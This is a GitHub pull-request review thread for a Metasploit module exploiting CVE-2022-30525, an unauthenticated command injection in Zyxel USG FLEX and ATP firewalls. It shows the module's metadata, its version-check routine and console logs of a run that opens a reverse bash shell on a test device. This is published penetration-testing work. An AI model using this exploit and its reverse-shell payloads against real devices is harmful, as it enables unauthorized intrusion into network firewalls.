modules/exploits/linux/http/zyxel_ztp_rce.rb

```diff
@@ -0,0 +1,157 @@
+          in order to achieve command execution as `nobody`.
+
+          Affected Zyxel models are:
+
+          * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
+          * USG20-VPN and USG20W-VPN using firmware 5.21 and below
+          * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2022-30525' ],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']
+        ],
+        'DisclosureDate' => '2022-04-28',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPS64,],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Shell Dropper',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPS64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  # Checks the build date that is embedded in the landing page. If it finds a build
+  # date older than April 20, 2022 then it will additionally check if the model is
+  # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this
+  # seems like a reasonable approach.
+  def check
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))
+    unless res
+      return CheckCode::Unknown('The target failed to respond to check.')
+    end
+
+    unless res.code == 200
+      return CheckCode::Safe('Failed to retrieve /')
+    end
+
+    ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date]
+    if ver.nil?
+      return CheckCode::Safe('Could not extract a version number')
+    end
+
+    if ver[0..5].to_i < 220420
+      model = res.body[/<title>(?<model>[^<]+)/, :model]
+      if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))
```

Comment:
Consider something like xpath used here: https://github.com/rapid7/metasploit-framework/pull/16505/files

Reply:
As per Jeffrey's request, I swapped this over to use 

```
res.get_html_document.xpath('//title').text
```

After the change I ran through our [test server](https://github.com/jbaines-r7/zyxel_scanner_environment) and received all expected results :shrug: 

```
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target appears to be vulnerable. This was determined by the model and build date: ATP100, 200514215832
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target is not exploitable. This determination is based on the build date string: 220420054748.
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target is not exploitable. This determination is based on the build date string: 220420002650.
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target is not exploitable. This determination is based on the build date string: 220420024657.
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target is not exploitable. This determination is based on the build date string: 220420024617.
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100W, 210923145957
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 200, 210327005237
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 500, 210704021311
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 700, 220315035335
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target is not exploitable. This determination is based on the build date string: 220420001613.
msf6 exploit(linux/http/zyxel_ztp_rce) > check
[*] 10.0.0.28:443 - The target appears to be vulnerable. This was determined by the model and build date: USG20W-VPN, 210625223343
```

I also reran against our actual target and all is well.

```
msf6 > use exploit/linux/http/zyxel_ztp_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
RHOST => 10.0.0.14
msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
LHOST => 10.0.0.28
msf6 exploit(linux/http/zyxel_ztp_rce) > run

[*] Started reverse TCP handler on 10.0.0.28:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
[*] Executing Shell Dropper for cmd/unix/reverse_bash
[*] Sending command to /ztp/cgi-bin/handler
[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:49993) at 2022-05-12 07:15:37 -0700
[+] Command successfully executed.

id
uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
exit
[*] 10.0.0.14 - Command shell session 1 closed.
```

Reply:
XPath is friend.